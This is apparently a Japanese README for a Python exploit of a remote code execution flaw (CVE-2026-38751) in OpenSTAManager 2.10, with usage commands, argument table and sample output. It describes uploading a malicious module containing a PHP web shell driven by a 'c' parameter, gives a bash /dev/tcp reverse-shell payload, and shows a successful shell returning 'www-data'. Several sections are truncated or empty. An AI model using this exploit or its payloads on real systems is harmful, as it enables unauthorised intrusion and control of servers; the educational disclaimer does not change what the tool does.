
OpenSTAManager RCE エクスプロイト (CVE-2026-38751)
このPythonスクリプトは、CVE-2026-38751として識別されたOpenSTAManagerバージョン2.10のリモートコード実行の脆弱性を悪用します。このエクスプロイトにより、認証されたユーザーは悪意のあるモジュールをアップロードし、ターゲットシステム上で任意のコマンドを実行できます。
エクスプロイトは以下の手順で動作します:
MODULE)c を介してコマンドを実行するPHPシェルスクリプト (shell.php)requests, zipfilepython3 exploit.py -u http://target.com -U admin -P password
python3 exploit.py -u http://target.com -U admin -P password --interactive
python3 exploit.py -u http://target.com -U admin -P password --lhost 10.10.14.180 --lport 4444
shell/MODULE: モジュール設定ファイルshell/shell.php: GETパラメータ c で渡されたコマンドを実行するPHPウェブシェルidのような簡単なコマンドを実行してアップロードしたシェルが動作していることを確認しますエクスプロイトは複数のリバースシェルペイロードを試みます:
bash -i >& /dev/tcp/{lhost}/{lport} 0>&1⚠️ 免責事項: このエクスプロイトは教育目的および許可されたセキュリティテスト目的のみに使用することを意図しています。
この脆弱性により以下が可能になります:
この脆弱性から保護するには:
[ OpenSTAManager RCE Exploit : ]
ターゲット: http://target.com
[*] ステップ 1: ログイン中...
[+] ログイン成功: admin
[*] ステップ 2: アップデート有効化中...
[+] アップデート有効化
[*] ステップ 3: ZIP作成中...
[*] メモリ内ZIPファイルを作成しました
[*] シェル位置: /modules/shell/shell.php
[*] ステップ 4: アップロード中...
[*] アップロードステータス: 200
[+] アップロード成功
[*] ステップ 5: 検証中...
[+] 脆弱性確認完了!
[+] シェル: http://target.com/modules/shell/shell.php
[+] テスト: http://target.com/modules/shell/shell.php?c=whoami
[*] 対話型モードに入ります...
cmd> whoami
www-data
cmd> exit
このエクスプロイトは教育目的のみで提供されています。あなたが所有していない、または明示的なテスト許可を得ていないシステムに対する無許可の使用は違法です。
| 引数 | 説明 |
|---|
-u, --url | ターゲットURL(必須) |
-U, --user | 認証用ユーザー名(必須) |
-P, --password | 認証用パスワード(必須) |
--interactive | 対話型シェルモードに入る |
--no-cleanup | 実行後にシェルファイルを削除しない |
--lhost | リバースシェル用のローカルホスト |
--lport | リバースシェル用のローカルポート |